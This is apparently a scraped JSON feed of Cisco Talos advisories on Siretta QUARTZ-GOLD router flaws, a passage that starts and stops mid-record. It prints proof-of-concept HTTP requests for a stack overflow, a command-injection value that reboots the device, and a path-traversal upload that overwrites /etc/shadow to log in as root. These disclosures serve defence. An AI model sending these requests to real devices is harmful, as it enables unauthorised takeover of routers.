"AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-40222"], "modified": "2023-01-26T00:00:00", "id": "TALOS-2022-1638", "href": "https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1638", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-03T15:19:42", "description": "# Talos Vulnerability Report\n\n### TALOS-2022-1608\n\n## Siretta QUARTZ-GOLD httpd downfile.cgi stack-based buffer overflow vulnerability\n\n##### January 26, 2023\n\n##### CVE Number\n\nCVE-2022-38459\n\n##### SUMMARY\n\nA stack-based buffer overflow vulnerability exists in the httpd downfile.cgi functionality of Siretta QUARTZ-GOLD G5.0.1.5-210720-141020. A specially-crafted HTTP request can lead to remote code execution. An attacker can send an HTTP request to trigger this vulnerability.\n\n##### CONFIRMED VULNERABLE VERSIONS\n\nThe versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.\n\nSiretta QUARTZ-GOLD G5.0.1.5-210720-141020\n\n##### PRODUCT URLS\n\nQUARTZ-GOLD - <https://www.siretta.com/products/industrial-routers/4g-lte-router/gigabit-ethernet-small-footprint-lte-router-eu/>\n\n##### CVSSv3 SCORE\n\n7.2 - CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H\n\n##### CWE\n\nCWE-120 - Buffer Copy without Checking Size of Input (\u2018Classic Buffer Overflow\u2019)\n\n##### DETAILS\n\nThe Siretta QUARTZ-GOLD is an industrial cellular router with several features and services, such as: SSH, UPNP, VPN, SNMP and many others.\n\nThe QUARTZ-GOLD router has a web server with several functionalities, a subset of which are related to the management of external files. Indeed, the web-server offers API for uploading files, downloading them, and also deleting if no longer required.\n\nFollowing the API to download a previously uploaded file:\n \n \n void downfile.cgi(void)\n \n {\n [...]\n \n _filename_param = (char *)webcgi_safeget(\"_filename\"); [1]\n filename = \"\";\n if (_filename_param != (char *)0x0) {\n filename = _filename_param;\n }\n [... calculate base_folder ...]\n if (*filename != '\\0') {\n sprintf(buff,\"Content-Disposition:attachment;filename=\\\"%s\\\"\",(char)filename);\n send_header(200,buff,\"application/tomato-binary-file\",0);\n sprintf(buff,\"%s/%s\",base_folder,filename); [2]\n do_file(buff); [3]\n }\n return;\n }\n \n\nThe `downfile.cgi` expects one parameter called `_filename` that represents the filename of the desired file to be downloaded. At `[1]` the uploaded parameter is taken and then used at `[2]`. The function used at `[2]` is a `sprintf`, which does not take into consideration the size of the buffer. If the `_filename` parameter is longer than a certain length, the instruction at `[2]` would cause a stack-based buffer overflow that could led to remote code execution.\n\n### Crash Information\n \n \n $r0 : 0x0 \n $r1 : 0x0 \n $r2 : 0x7ef38c60 \u2192 \"/jffs/aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaa[...]\"\n $r3 : 0x2000 \n $r4 : 0x61666b61 (\"akfa\"?)\n $r5 : 0x61676b61 (\"akga\"?)\n $r6 : 0x61686b61 (\"akha\"?)\n $r7 : 0x1 \n $r8 : 0x0 \n $r9 : 0x0001e658 \u2192 \"downfile.cgi\"\n $r10 : 0x0001dbac \u2192 0x0001e658 \u2192 \"downfile.cgi\"\n $r11 : 0x7ef3b784 \u2192 \"admin\"\n $r12 : 0x2ae5573c \u2192 0x2ae41ac4 \u2192 <_pthread_cleanup_pop_restore+0> push {r3, lr}\n $sp : 0x7ef39070 \u2192 \"akjaakkaaklaakmaaknaakoaakpaakqaakraaksaaktaak\"\n $lr : 0x2ae3bb30 \u2192 <free+492> pop {r0, r1, r2, r3, r4, r5, r6, pc}\n $pc : 0x61696b60 (\"`kia\"?)\n $cpsr: [negative ZERO CARRY overflow interrupt fast THUMB]\n \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500 stack \u2500\u2500\u2500\u2500\n 0x7ef39070\u2502+0x0000: \"akjaakkaaklaakmaaknaakoaakpaakqaakraaksaaktaak\" \u2190 $sp\n 0x7ef39074\u2502+0x0004: \"akkaaklaakmaaknaakoaakpaakqaakraaksaaktaak\"\n 0x7ef39078\u2502+0x0008: \"aklaakmaaknaakoaakpaakqaakraaksaaktaak\"\n 0x7ef3907c\u2502+0x000c: \"akmaaknaakoaakpaakqaakraaksaaktaak\"\n 0x7ef39080\u2502+0x0010: \"aknaakoaakpaakqaakraaksaaktaak\"\n 0x7ef39084\u2502+0x0014: \"akoaakpaakqaakraaksaaktaak\"\n 0x7ef39088\u2502+0x0018: \"akpaakqaakraaksaaktaak\"\n 0x7ef3908c\u2502+0x001c: \"akqaakraaksaaktaak\"\n \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500 code:arm:THUMB \u2500\u2500\u2500\u2500\n [!] Cannot disassemble from $PC\n [!] Cannot access memory at address 0x61696b60\n \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500 threads \u2500\u2500\u2500\u2500\n [#0] Id 1, Name: \"httpd\", stopped 0x61696b60 in ?? (), reason: SIGSEGV\n \n\n### Exploit Proof of Concept\n\nSending a request like the following:\n \n \n POST /downfile.cgi HTTP/1.1\n Authorization: Basic <a valid basic auth>\n Content-Length: 1119\n \n _filename=aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaabzaacbaaccaacdaaceaacfaacgaachaaciaacjaackaaclaacmaacnaacoaacpaacqaacraacsaactaacuaacvaacwaacxaacyaaczaadbaadcaaddaadeaadfaadgaadhaadiaadjaadkaadlaadmaadnaadoaadpaadqaadraadsaadtaaduaadvaadwaadxaadyaadzaaebaaecaaedaaeeaaefaaegaaehaaeiaaejaaekaaelaaemaaenaaeoaaepaaeqaaeraaesaaetaaeuaaevaaewaaexaaeyaaezaafbaafcaafdaafeaaffaafgaafhaafiaafjaafkaaflaafmaafnaafoaafpaafqaafraafsaaftaafuaafvaafwaafxaafyaafzaagbaagcaagdaageaagfaaggaaghaagiaagjaagkaaglaagmaagnaagoaagpaagqaagraagsaagtaaguaagvaagwaagxaagyaagzaahbaahcaahdaaheaahfaahgaahhaahiaahjaahkaahlaahmaahnaahoaahpaahqaahraahsaahtaahuaahvaahwaahxaahyaahzaaibaaicaaidaaieaaifaaigaaihaaiiaaijaaikaailaaimaainaaioaaipaaiqaairaaisaaitaaiuaaivaaiwaaixaaiyaaizaajbaajcaajdaajeaajfaajgaajhaajiaajjaajkaajlaajmaajnaajoaajpaajqaajraajsaajtaajuaajvaajwaajxaajyaajzaakbaakcaakdaakeaakfaakgaakhaakiaakjaakkaaklaakmaaknaakoaakpaakqaakraaksaaktaak&_http_id=<the correct tid>\n \n\nThe status at the return address of the `downfile.cgi` function would be:\n \n \n $r0 : 0x0 \n $r1 : 0x0 \n $r2 : 0x7ef38c60 \u2192 \"/jffs/aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaa[...]\"\n $r3 : 0x2000 \n $r4 : 0x7ef38c60 \u2192 \"/jffs/aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaa[...]\"\n $r5 : 0x00031082 \u2192 \"aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaama[...]\"\n $r6 : 0x0002272b \u2192 \"/jffs\"\n $r7 : 0x1 \n $r8 : 0x0 \n $r9 : 0x0001e658 \u2192 \"downfile.cgi\"\n $r10 : 0x0001dbac \u2192 0x0001e658 \u2192 \"downfile.cgi\"\n $r11 : 0x7ef3b784 \u2192 \"admin\"\n $r12 : 0x2ae5573c \u2192 0x2ae41ac4 \u2192 <_pthread_cleanup_pop_restore+0> push {r3, lr}\n $sp : 0x7ef39060 \u2192 \"akfaakgaakhaakiaakjaakkaaklaakmaaknaakoaakpaakqaak[...]\"\n $lr : 0x2ae3bb30 \u2192 <free+492> pop {r0, r1, r2, r3, r4, r5, r6, pc}\n $pc : 0x0000f96c \u2192 pop {r4, r5, r6, pc}\n $cpsr: [negative ZERO CARRY overflow interrupt fast thumb]\n \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500 stack \u2500\u2500\u2500\u2500\n 0x7ef39060\u2502+0x0000: \"akfaakgaakhaakiaakjaakkaaklaakmaaknaakoaakpaakqaak[...]\" \u2190 $sp\n 0x7ef39064\u2502+0x0004: \"akgaakhaakiaakjaakkaaklaakmaaknaakoaakpaakqaakraak[...]\"\n 0x7ef39068\u2502+0x0008: \"akhaakiaakjaakkaaklaakmaaknaakoaakpaakqaakraaksaak[...]\"\n 0x7ef3906c\u2502+0x000c: \"akiaakjaakkaaklaakmaaknaakoaakpaakqaakraaksaaktaak\"\n 0x7ef39070\u2502+0x0010: \"akjaakkaaklaakmaaknaakoaakpaakqaakraaksaaktaak\"\n 0x7ef39074\u2502+0x0014: \"akkaaklaakmaaknaakoaakpaakqaakraaksaaktaak\"\n 0x7ef39078\u2502+0x0018: \"aklaakmaaknaakoaakpaakqaakraaksaaktaak\"\n 0x7ef3907c\u2502+0x001c: \"akmaaknaakoaakpaakqaakraaksaaktaak\"\n \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500 code:arm:ARM \u2500\u2500\u2500\u2500\n 0xf960 mov r0, sp\n 0xf964 bl 0xbbc8\n 0xf968 add sp, sp, #1024 ; 0x400\n \u2192 0xf96c pop {r4, r5, r6, pc}\n [!] Cannot disassemble from $PC\n \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500 threads \u2500\u2500\u2500\u2500\n [#0] Id 1, Name: \"httpd\", stopped 0xf96c in ?? (), reason: BREAKPOINT\n \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500 trace \u2500\u2500\u2500\u2500\n [#0] 0xf96c \u2192 pop {r4, r5, r6, pc}\n [#1] 0x2ae3bb30 \u2192 free()\n \n\nSo the next instruction will populate the `pc` with the fourth dword contained in the stack, so:\n \n \n gef\u27a4 hexdump dw $sp\n 0x7ef39060\u2502+0x0000 0x61666b61 \n 0x7ef39064\u2502+0x0004 0x61676b61 \n 0x7ef39068\u2502+0x0008 0x61686b61 \n 0x7ef3906c\u2502+0x000c 0x61696b61 \n [...]\n \n\nAfter the pop the `pc` will contain the `0x61696b61` value.\n\n##### TIMELINE\n\n2022-10-14 - Initial Vendor Contact\n\n2022-10-20 - Vendor Disclosure\n\n2022-11-24 - Vendor Patch Release\n\n2023-01-26 - Public Release\n\n##### Credit\n\nDiscovered by Francesco Benvenuto of Cisco Talos.\n\n* * *\n\nVulnerability Reports Next Report\n\nTALOS-2022-1610\n\nPrevious Report\n\nTALOS-2022-1609\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-01-26T00:00:00", "type": "talos", "title": "Siretta QUARTZ-GOLD httpd downfile.cgi stack-based buffer overflow vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-38459"], "modified": "2023-01-26T00:00:00", "id": "TALOS-2022-1608", "href": "https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1608", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2023-06-03T15:19:40", "description": "# Talos Vulnerability Report\n\n### TALOS-2022-1607\n\n## Siretta QUARTZ-GOLD httpd delfile.cgi OS command injection vulnerability\n\n##### January 26, 2023\n\n##### CVE Number\n\nCVE-2022-40969\n\n##### SUMMARY\n\nAn os command injection vulnerability exists in the httpd delfile.cgi functionality of Siretta QUARTZ-GOLD G5.0.1.5-210720-141020. A specially-crafted HTTP request can lead to arbitrary command execution. An attacker can send an HTTP request to trigger this vulnerability.\n\n##### CONFIRMED VULNERABLE VERSIONS\n\nThe versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.\n\nSiretta QUARTZ-GOLD G5.0.1.5-210720-141020\n\n##### PRODUCT URLS\n\nQUARTZ-GOLD - <https://www.siretta.com/products/industrial-routers/4g-lte-router/gigabit-ethernet-small-footprint-lte-router-eu/>\n\n##### CVSSv3 SCORE\n\n7.2 - CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H\n\n##### CWE\n\nCWE-78 - Improper Neutralization of Special Elements used in an OS Command (\u2018OS Command Injection\u2019)\n\n##### DETAILS\n\nThe Siretta QUARTZ-GOLD is an industrial cellular router with several features and services, such as: SSH, UPNP, VPN, SNMP and many others.\n\nThe QUARTZ-GOLD router has a web server with several functionalities, a subset of which are related to the management of external files. Indeed, the web-server offers API for uploading files, downloading them, and also deleting if no longer required.\n\nFollowing the API to delete a previously uploaded file:\n \n \n void delfile.cgi(void)\n \n {\n [...]\n \n [... calculate the value of the base_folder variable ...]\n _filename_param = (char *)webcgi_safeget(\"_filename\"); [1]\n filename_ = \"\";\n if (_filename_param != (char *)0x0) {\n filename_ = _filename_param;\n }\n if (*filename_ != '\\0') {\n sprintf(command_buff,\"rm -rf %s/%s\",base_folder,filename_); [2]\n system(command_buff); [3]\n }\n [...]\n }\n \n\nThe `delfile.cgi` expects one parameter called `_filename` that represents the filename of the desired file to be deleted. At `[1]` the uploaded parameter is taken and then used at `[2]` for composing the command `rm -rf <base_folder>/<_filename>`. The composed string is then used at `[3]` as argument of the `system` function. The `_filename` is not sanitized and will be used in the `system` function, which can lead to an OS command injection.\n\n### Exploit Proof of Concept\n\nSending a request like the following:\n \n \n POST /delfile.cgi HTTP/1.1\n Authorization: Basic <a valid basic auth value>\n Content-Length: 48\n \n _filename=`reboot`f&_http_id=<the correct tid>\n \n\nwill cause the device to reboot.\n\n##### TIMELINE\n\n2022-10-14 - Initial Vendor Contact\n\n2022-10-20 - Vendor Disclosure\n\n2022-11-24 - Vendor Patch Release\n\n2023-01-26 - Public Release\n\n##### Credit\n\nDiscovered by Francesco Benvenuto of Cisco Talos.\n\n* * *\n\nVulnerability Reports Next Report\n\nTALOS-2022-1609\n\nPrevious Report\n\nTALOS-2022-1606\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-01-26T00:00:00", "type": "talos", "title": "Siretta QUARTZ-GOLD httpd delfile.cgi OS command injection vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-40969"], "modified": "2023-01-26T00:00:00", "id": "TALOS-2022-1607", "href": "https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1607", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2023-06-03T15:19:43", "description": "# Talos Vulnerability Report\n\n### TALOS-2022-1611\n\n## Siretta QUARTZ-GOLD httpd upload.cgi file write vulnerability\n\n##### January 26, 2023\n\n##### CVE Number\n\nCVE-2022-39045\n\n##### SUMMARY\n\nA file write vulnerability exists in the httpd upload.cgi functionality of Siretta QUARTZ-GOLD G5.0.1.5-210720-141020. A specially-crafted HTTP request can lead to arbitrary file upload. An attacker can send an HTTP request to trigger this vulnerability.\n\n##### CONFIRMED VULNERABLE VERSIONS\n\nThe versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.\n\nSiretta QUARTZ-GOLD G5.0.1.5-210720-141020\n\n##### PRODUCT URLS\n\nQUARTZ-GOLD - <https://www.siretta.com/products/industrial-routers/4g-lte-router/gigabit-ethernet-small-footprint-lte-router-eu/>\n\n##### CVSSv3 SCORE\n\n7.2 - CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H\n\n##### CWE\n\nCWE-22 - Improper Limitation of a Pathname to a Restricted Directory (\u2018Path Traversal\u2019)\n\n##### DETAILS\n\nThe Siretta QUARTZ-GOLD is an industrial cellular router with several features and services, such as: SSH, UPNP, VPN, SNMP and many others.\n\nThe QUARTZ-GOLD router has a web server with several functionalities, a subset of which are related to the management of external files. Indeed, the web-server offers API for uploading files, downloading them, and also deleting if no longer required.\n\nThe endpoint `upload.cgi` permits to upload a file. Following one of the functions responsible for this API:\n \n \n void input_upload.cgi(char *path,int len,char *boundary)\n \n {\n [...] \n remaining_length_to_write = len;\n storage_udisk = nvram_get_int(\"storage_udisk\");\n [... calculate base_folder and perform basic checks...]\n else {\n [...]\n filename_param = (char *)webcgi_safeget(\"filename\"); [1]\n filename = \"\";\n if (filename_param != (char *)0x0) {\n filename = filename_param;\n }\n sprintf(buff,\"%s/%s\",base_folder,filename); [2]\n fd = fopen(buff,\"w\"); [3]\n if (fd == (FILE *)0x0) {\n base_folder = \"Unable to start pipe for mtd write\";\n }\n else {\n [...]\n boundary_len = strlen(boundary);\n remaining_length_to_write = (remaining_length_to_write - 6) - boundary_len;\n while (0 < (int)remaining_length_to_write) {\n n_bytes_to_read = remaining_length_to_write;\n [...]\n n_bytes_read = web_read(buff,n_bytes_to_read);\n [...]\n remaining_length_to_write = remaining_length_to_write - n_bytes_read;\n bytes_written = safe_fwrite(buff,1,n_bytes_read,fd); [4]\n [...]\n }\n \n\nThis function will fetch the specified filename, at `[1]`, and then it will use it to compose the file-path at `[2]`. The compose file-path is used at `[3]` to create/overwrite the file, and then the uploaded file will be used for the content of the just-created/overwritten file at `[4]`. Because from `[1]` up to `[2]` no sanitization is performed against the `filename` parameter, this function is vulnerable to a path traversal vulnerability. This can lead to overwriting an arbitrary file in the file-system and can lead to arbitrary command execution.\n\n### Exploit Proof of Concept\n\nSending a request like the following:\n \n \n POST /upload.cgi?_http_id=<the correct tid>&filename=..%2F..%2F..%2Fetc%2Fshadow HTTP/1.1\n Authorization: Basic <a valid basic auth value>\n Content-Length: 286\n Content-Type: multipart/form-data; boundary=906881afb7fae201f7f9962a229f9884\n \n --906881afb7fae201f7f9962a229f9884\n Content-Disposition: form-data; name=\"content\"; filename=\"content\"\n \n root:$1$xxhYe9mq$YZ6ujl9zSX304B71rcuY80:0:0:99999:7:0:0:\n admin:$1$xxhYe9mq$YZ6ujl9zSX304B71rcuY80:0:0:99999:7:0:0:\n nobody:*:0:0:99999:7:0:0:\n --906881afb7fae201f7f9962a229f9884--\n \n\nIf the request was successful, it is now possible to access the device using `root:admin` as credentials. For instance connecting, using telnet, to the port 2323 we can provide the injected credentials:\n \n \n \u276f telnet 192.168.0.1 2323\n Trying 192.168.0.1...\n Connected to 192.168.0.1.\n Escape character is '^]'.\n QUARTZ-GOLD login: root\n Password: \n \n root@QUARTZ-GOLD:/tmp/home/root#\n \n\nEffectively allowing arbitrary command 